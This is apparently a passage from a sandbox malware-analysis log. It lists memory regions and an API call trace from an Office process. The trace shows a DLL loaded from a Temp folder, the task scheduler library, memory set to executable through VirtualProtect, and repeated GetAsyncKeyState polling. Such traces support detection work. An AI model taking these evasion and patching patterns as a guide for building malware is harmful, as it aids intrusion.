"rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 680 start_va = 0x11610000 end_va = 0x1164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011610000" filename = "" Region: id = 681 start_va = 0x11650000 end_va = 0x1174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 682 start_va = 0x70490000 end_va = 0x704d6fff monitored = 0 entry_point = 0x704a58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 683 start_va = 0x11750000 end_va = 0x11752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 684 start_va = 0x11760000 end_va = 0x11767fff monitored = 0 entry_point = 0x117619c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 685 start_va = 0x11770000 end_va = 0x11770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 686 start_va = 0x11760000 end_va = 0x11767fff monitored = 0 entry_point = 0x117619c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 687 start_va = 0x11770000 end_va = 0x11770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 688 start_va = 0x11760000 end_va = 0x11767fff monitored = 0 entry_point = 0x117619c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 689 start_va = 0x11770000 end_va = 0x11770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 690 start_va = 0x11760000 end_va = 0x11767fff monitored = 0 entry_point = 0x117619c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 691 start_va = 0x11770000 end_va = 0x11770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 692 start_va = 0x11760000 end_va = 0x11770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 693 start_va = 0x11780000 end_va = 0x11c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011780000" filename = "" Region: id = 694 start_va = 0x11c80000 end_va = 0x11c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c80000" filename = "" Region: id = 695 start_va = 0x690d0000 end_va = 0x69122fff monitored = 1 entry_point = 0x690f0809 region_type = mapped_file name = "wnitmpo.dll" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wnitmpo.dll") Region: id = 696 start_va = 0x11c90000 end_va = 0x11c90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011c90000" filename = "" Region: id = 697 start_va = 0x69040000 end_va = 0x690cbfff monitored = 0 entry_point = 0x6907a6c0 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1062 start_va = 0xd150000 end_va = 0xd55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 1063 start_va = 0xd560000 end_va = 0xd96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d560000" filename = "" Region: id = 1064 start_va = 0xd970000 end_va = 0xdd7cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d970000" filename = "" Region: id = 1065 start_va = 0x11ca0000 end_va = 0x11caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ca0000" filename = "" Region: id = 1066 start_va = 0x11ca0000 end_va = 0x11caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ca0000" filename = "" Region: id = 1067 start_va = 0x11cb0000 end_va = 0x11cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cb0000" filename = "" Region: id = 1068 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 1069 start_va = 0x11cc0000 end_va = 0x11cccfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011cc0000" filename = "" Region: id = 1070 start_va = 0x11cd0000 end_va = 0x11cdcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011cd0000" filename = "" Region: id = 1071 start_va = 0x11ce0000 end_va = 0x11ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ce0000" filename = "" Region: id = 1072 start_va = 0x69000000 end_va = 0x6903afff monitored = 0 entry_point = 0x690156aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msproof7.dll") Region: id = 1073 start_va = 0x11de0000 end_va = 0x11de0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 1074 start_va = 0x11de0000 end_va = 0x11e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011de0000" filename = "" Region: id = 1075 start_va = 0x11e20000 end_va = 0x11f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e20000" filename = "" Region: id = 1076 start_va = 0x68fe0000 end_va = 0x68ff2fff monitored = 0 entry_point = 0x68fe25d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1077 start_va = 0x68fc0000 end_va = 0x68fd3fff monitored = 0 entry_point = 0x68fc3c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1078 start_va = 0x68f50000 end_va = 0x68fb7fff monitored = 0 entry_point = 0x68f770a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 1079 start_va = 0x68f00000 end_va = 0x68f48fff monitored = 0 entry_point = 0x68f06450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 1080 start_va = 0x9a40000 end_va = 0x9a41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 1081 start_va = 0x9a50000 end_va = 0x9a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 1082 start_va = 0x9a60000 end_va = 0x9a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a60000" filename = "" Region: id = 1083 start_va = 0x9a60000 end_va = 0x9a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a60000" filename = "" Region: id = 1084 start_va = 0x9a60000 end_va = 0x9a60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a60000" filename = "" Region: id = 1085 start_va = 0x9a70000 end_va = 0x9b65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 1086 start_va = 0x11f20000 end_va = 0x12411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f20000" filename = "" Region: id = 1087 start_va = 0x70420000 end_va = 0x70483fff monitored = 0 entry_point = 0x7043afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1088 start_va = 0x9b70000 end_va = 0x9b71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b70000" filename = "" Region: id = 1089 start_va = 0x9b80000 end_va = 0x9b81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b80000" filename = "" Region: id = 1090 start_va = 0x9b90000 end_va = 0x9b91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b90000" filename = "" Region: id = 1091 start_va = 0x9ba0000 end_va = 0x9ba1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ba0000" filename = "" Region: id = 1092 start_va = 0x9bb0000 end_va = 0x9d50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cambria.ttc" filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc") Region: id = 1093 start_va = 0x12420000 end_va = 0x1261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012420000" filename = "" Region: id = 1094 start_va = 0x9d60000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009d60000" filename = "" Region: id = 1095 start_va = 0x9d70000 end_va = 0x9d71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d70000" filename = "" Region: id = 1096 start_va = 0x9d80000 end_va = 0x9d81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d80000" filename = "" Region: id = 1097 start_va = 0x9d60000 end_va = 0x9d62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d60000" filename = "" Region: id = 1098 start_va = 0x9d90000 end_va = 0x9d91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d90000" filename = "" Region: id = 1099 start_va = 0x9da0000 end_va = 0x9da1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009da0000" filename = "" Region: id = 1100 start_va = 0x70410000 end_va = 0x7041ffff monitored = 0 entry_point = 0x70414600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1101 start_va = 0x9db0000 end_va = 0x9db1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009db0000" filename = "" Region: id = 1102 start_va = 0x9dc0000 end_va = 0x9dc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009dc0000" filename = "" Region: id = 1103 start_va = 0x9dd0000 end_va = 0x9dd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009dd0000" filename = "" Region: id = 1104 start_va = 0x9de0000 end_va = 0x9de1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009de0000" filename = "" Region: id = 1105 start_va = 0x703f0000 end_va = 0x7040ffff monitored = 0 entry_point = 0x703fd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1106 start_va = 0x9df0000 end_va = 0x9ee3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 1107 start_va = 0x9ef0000 end_va = 0x9ef1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ef0000" filename = "" Region: id = 1108 start_va = 0x9f00000 end_va = 0x9f01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 1109 start_va = 0x9f10000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 1110 start_va = 0x9f20000 end_va = 0x9f21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 1111 start_va = 0x9f30000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 1112 start_va = 0x12620000 end_va = 0x12621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012620000" filename = "" Region: id = 1113 start_va = 0x703c0000 end_va = 0x703ebfff monitored = 0 entry_point = 0x703dbb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1114 start_va = 0x12630000 end_va = 0x12630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012630000" filename = "" Region: id = 1115 start_va = 0x12630000 end_va = 0x1266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012630000" filename = "" Region: id = 1116 start_va = 0x12670000 end_va = 0x1276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012670000" filename = "" Region: id = 1117 start_va = 0x703a0000 end_va = 0x703b9fff monitored = 0 entry_point = 0x703afa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1118 start_va = 0x9a40000 end_va = 0x9a49fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1119 start_va = 0x68df0000 end_va = 0x68ef9fff monitored = 0 entry_point = 0x68e51e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 1120 start_va = 0x70390000 end_va = 0x70397fff monitored = 0 entry_point = 0x70391d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1121 start_va = 0x68d80000 end_va = 0x68de3fff monitored = 0 entry_point = 0x68d868c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 1136 start_va = 0x9a50000 end_va = 0x9a52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 1137 start_va = 0x9b70000 end_va = 0x9b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b70000" filename = "" Region: id = 1144 start_va = 0x9a50000 end_va = 0x9a52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 1145 start_va = 0x9b70000 end_va = 0x9b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b70000" filename = "" Region: id = 1321 start_va = 0x11f20000 end_va = 0x12411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f20000" filename = "" Region: id = 1322 start_va = 0x12770000 end_va = 0x12b2cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012770000" filename = "" Region: id = 1323 start_va = 0x12b30000 end_va = 0x12eecfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012b30000" filename = "" Region: id = 1324 start_va = 0x12ef0000 end_va = 0x132acfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ef0000" filename = "" Region: id = 1325 start_va = 0x132b0000 end_va = 0x13678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000132b0000" filename = "" Region: id = 1326 start_va = 0x13680000 end_va = 0x13a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013680000" filename = "" Region: id = 1327 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1328 start_va = 0x110000 end_va = 0x111fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1331 start_va = 0x12ef0000 end_va = 0x132acfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ef0000" filename = "" Region: id = 1332 start_va = 0x132b0000 end_va = 0x13676fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000132b0000" filename = "" Region: id = 1471 start_va = 0x12ef0000 end_va = 0x132acfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012ef0000" filename = "" Region: id = 1472 start_va = 0x132b0000 end_va = 0x1366cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000132b0000" filename = "" Region: id = 1473 start_va = 0x13a40000 end_va = 0x13dfcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013a40000" filename = "" Region: id = 1474 start_va = 0x13e00000 end_va = 0x141bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e00000" filename = "" Region: id = 1488 start_va = 0x100000 end_va = 0x103fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Thread: id = 1 os_tid = 0x133c Thread: id = 2 os_tid = 0x1328 Thread: id = 3 os_tid = 0x1324 Thread: id = 4 os_tid = 0x1320 Thread: id = 5 os_tid = 0x131c Thread: id = 6 os_tid = 0x1314 Thread: id = 7 os_tid = 0x1310 Thread: id = 8 os_tid = 0x130c Thread: id = 9 os_tid = 0x1308 Thread: id = 10 os_tid = 0x1304 Thread: id = 11 os_tid = 0x1300 Thread: id = 12 os_tid = 0x12fc Thread: id = 13 os_tid = 0x12f8 Thread: id = 14 os_tid = 0x12f0 Thread: id = 15 os_tid = 0x12cc [0100.828] DispCallFunc (pvInstance=0xb3a1ba4, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x6f8170) returned 0x0 [0100.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x686711d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x6f8080 | out: lpThreadId=0x6f8080*=0xcfc) returned 0xba8 [0100.865] PeekMessageA (in: lpMsg=0x6f8060, hWnd=0x90216, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x6f8060) returned 0 [0100.941] NtdllDefWindowProc_A (hWnd=0x90216, Msg=0x1c, wParam=0x0, lParam=0xd48) returned 0x0 [0100.953] GetActiveWindow () returned 0x0 [0100.954] CRetailMalloc_Alloc () returned 0xcaa5598 [0100.954] CRetailMalloc_Realloc () returned 0xc792230 [0100.955] _mbscpy_s (in: _Dst=0x6f7990, _DstSizeInBytes=0x2, _Src=0x10182bf2 | out: _Dst=0x6f7990) returned 0x0 [0100.955] _mbscpy_s (in: _Dst=0x6f7990, _DstSizeInBytes=0x2, _Src=0x10182c12 | out: _Dst=0x6f7990) returned 0x0 [0100.955] _mbscpy_s (in: _Dst=0x6f7990, _DstSizeInBytes=0x2, _Src=0x10182c32 | out: _Dst=0x6f7990) returned 0x0 [0100.955] memcpy (in: _Dst=0x6f7a00, _Src=0x6f7a28, _Size=0x4 | out: _Dst=0x6f7a00) returned 0x6f7a00 [0100.955] realloc (_Block=0x0, _Size=0x100) returned 0xcb938c8 [0100.955] memcpy (in: _Dst=0xcb938c8, _Src=0x6f7a00, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0100.955] memcpy (in: _Dst=0xcb938cc, _Src=0x6f7a5c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0100.979] memcpy (in: _Dst=0xcb938d0, _Src=0x6f7a5c, _Size=0x4 | out: _Dst=0xcb938d0) returned 0xcb938d0 [0100.994] memcpy (in: _Dst=0x6f79d0, _Src=0x6f7a0c, _Size=0xc | out: _Dst=0x6f79d0) returned 0x6f79d0 [0100.994] realloc (_Block=0x0, _Size=0x60) returned 0xcb939d0 [0100.994] memcpy (in: _Dst=0xcb939d0, _Src=0x6f79d0, _Size=0xc | out: _Dst=0xcb939d0) returned 0xcb939d0 [0100.994] memcpy (in: _Dst=0xcb938c8, _Src=0x6f7a28, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0100.994] memcpy (in: _Dst=0xcb938c8, _Src=0x6f7a28, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0100.994] memcpy (in: _Dst=0xcb938c8, _Src=0x6f7a28, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0100.994] memcpy (in: _Dst=0xcb938cc, _Src=0x6f7a5c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0100.994] memcpy (in: _Dst=0xcb938d0, _Src=0x6f7a5c, _Size=0x4 | out: _Dst=0xcb938d0) returned 0xcb938d0 [0100.994] memcpy (in: _Dst=0xcb939d0, _Src=0x6f7a0c, _Size=0xc | out: _Dst=0xcb939d0) returned 0xcb939d0 [0100.994] memcpy (in: _Dst=0xcb938c8, _Src=0x6f7a28, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0100.994] memcpy (in: _Dst=0xcb938c8, _Src=0x6f7a28, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0100.995] CRetailMalloc_Alloc () returned 0xc82b960 [0100.995] CRetailMalloc_Realloc () returned 0xca6f138 [0100.995] CRetailMalloc_Alloc () returned 0xc973d28 [0100.995] memcpy (in: _Dst=0xcaa5608, _Src=0x6f7ac4, _Size=0x18 | out: _Dst=0xcaa5608) returned 0xcaa5608 [0100.995] CRetailMalloc_Realloc () returned 0xcaa5598 [0100.995] CRetailMalloc_Free () returned 0x1 [0100.995] GetCurrentProcess () returned 0xffffffff [0100.995] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722cc, dwSize=0x14) returned 1 [0100.995] VirtualProtect (in: lpAddress=0xca722cc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x6f776c | out: lpflOldProtect=0x6f776c*=0x40) returned 1 [0100.996] GetCurrentProcess () returned 0xffffffff [0100.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722cd, dwSize=0x2) returned 1 [0100.996] GetCurrentProcess () returned 0xffffffff [0100.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722ec, dwSize=0x14) returned 1 [0100.996] VirtualProtect (in: lpAddress=0xca722ec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x6f776c | out: lpflOldProtect=0x6f776c*=0x40) returned 1 [0100.997] GetCurrentProcess () returned 0xffffffff [0100.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722ed, dwSize=0x2) returned 1 [0100.997] GetCurrentProcess () returned 0xffffffff [0100.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca7230c, dwSize=0x14) returned 1 [0100.997] VirtualProtect (in: lpAddress=0xca7230c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x6f776c | out: lpflOldProtect=0x6f776c*=0x40) returned 1 [0100.998] GetCurrentProcess () returned 0xffffffff [0100.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca7230d, dwSize=0x2) returned 1 [0100.998] GetAsyncKeyState (vKey=3) returned 0 [0101.109] GetAsyncKeyState (vKey=3) returned 0 [0101.356] GetAsyncKeyState (vKey=3) returned 0 [0101.604] GetAsyncKeyState (vKey=3) returned 0 [0101.842] GetAsyncKeyState (vKey=3) returned 0 [0102.077] GetAsyncKeyState (vKey=3) returned 0 [0102.345] GetAsyncKeyState (vKey=3) returned 0 [0102.576] GetAsyncKeyState (vKey=3) returned 0 [0102.819] GetAsyncKeyState (vKey=3) returned 0 [0103.033] GetAsyncKeyState (vKey=3) returned 0 [0103.270] GetAsyncKeyState (vKey=3) returned 0 [0103.472] GetAsyncKeyState (vKey=3) returned 0 [0103.706] GetAsyncKeyState (vKey=3) returned 0 [0103.940] GetAsyncKeyState (vKey=3) returned 0 [0104.175] GetAsyncKeyState (vKey=3) returned 0 [0104.412] GetAsyncKeyState (vKey=3) returned 0 [0104.656] GetAsyncKeyState (vKey=3) returned 0 [0104.895] GetAsyncKeyState (vKey=3) returned 0 [0105.134] GetAsyncKeyState (vKey=3) returned 0 [0105.385] GetAsyncKeyState (vKey=3) returned 0 [0105.616] GetAsyncKeyState (vKey=3) returned 0 [0105.850] GetAsyncKeyState (vKey=3) returned 0 [0106.083] GetAsyncKeyState (vKey=3) returned 0 [0106.318] GetAsyncKeyState (vKey=3) returned 0 [0106.520] GetAsyncKeyState (vKey=3) returned 0 [0106.753] GetAsyncKeyState (vKey=3) returned 0 [0107.000] GetAsyncKeyState (vKey=3) returned 0 [0107.228] GetAsyncKeyState (vKey=3) returned 0 [0107.548] GetAsyncKeyState (vKey=3) returned 0 [0107.769] GetAsyncKeyState (vKey=3) returned 0 [0108.005] GetAsyncKeyState (vKey=3) returned 0 [0108.241] GetAsyncKeyState (vKey=3) returned 0 [0108.488] GetAsyncKeyState (vKey=3) returned 0 [0108.722] GetAsyncKeyState (vKey=3) returned 0 [0108.959] GetAsyncKeyState (vKey=3) returned 0 [0109.191] GetAsyncKeyState (vKey=3) returned 0 [0109.412] GetAsyncKeyState (vKey=3) returned 0 [0109.653] GetAsyncKeyState (vKey=3) returned 0 [0109.891] GetAsyncKeyState (vKey=3) returned 0 [0110.140] GetAsyncKeyState (vKey=3) returned 0 [0110.372] GetAsyncKeyState (vKey=3) returned 0 [0110.595] GetAsyncKeyState (vKey=3) returned 0 [0110.841] GetAsyncKeyState (vKey=3) returned 0 [0111.065] GetAsyncKeyState (vKey=3) returned 0 [0111.294] GetAsyncKeyState (vKey=3) returned 0 [0111.513] GetAsyncKeyState (vKey=3) returned 0 [0111.716] GetAsyncKeyState (vKey=3) returned 0 [0111.934] GetAsyncKeyState (vKey=3) returned 0 [0112.168] GetAsyncKeyState (vKey=3) returned 0 [0112.373] GetAsyncKeyState (vKey=3) returned 0 [0112.574] GetAsyncKeyState (vKey=3) returned 0 [0112.778] GetAsyncKeyState (vKey=3) returned 0 [0112.981] GetAsyncKeyState (vKey=3) returned 0 [0113.216] GetAsyncKeyState (vKey=3) returned 0 [0113.465] GetAsyncKeyState (vKey=3) returned 0 [0113.744] GetAsyncKeyState (vKey=3) returned 0 [0113.981] GetAsyncKeyState (vKey=3) returned 0 [0114.246] GetAsyncKeyState (vKey=3) returned 0 [0114.379] CRetailMalloc_Alloc () returned 0xcaa5660 [0114.379] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.379] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.380] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.380] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.387] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.387] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.387] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.387] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.387] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.387] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.387] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.387] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.387] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: 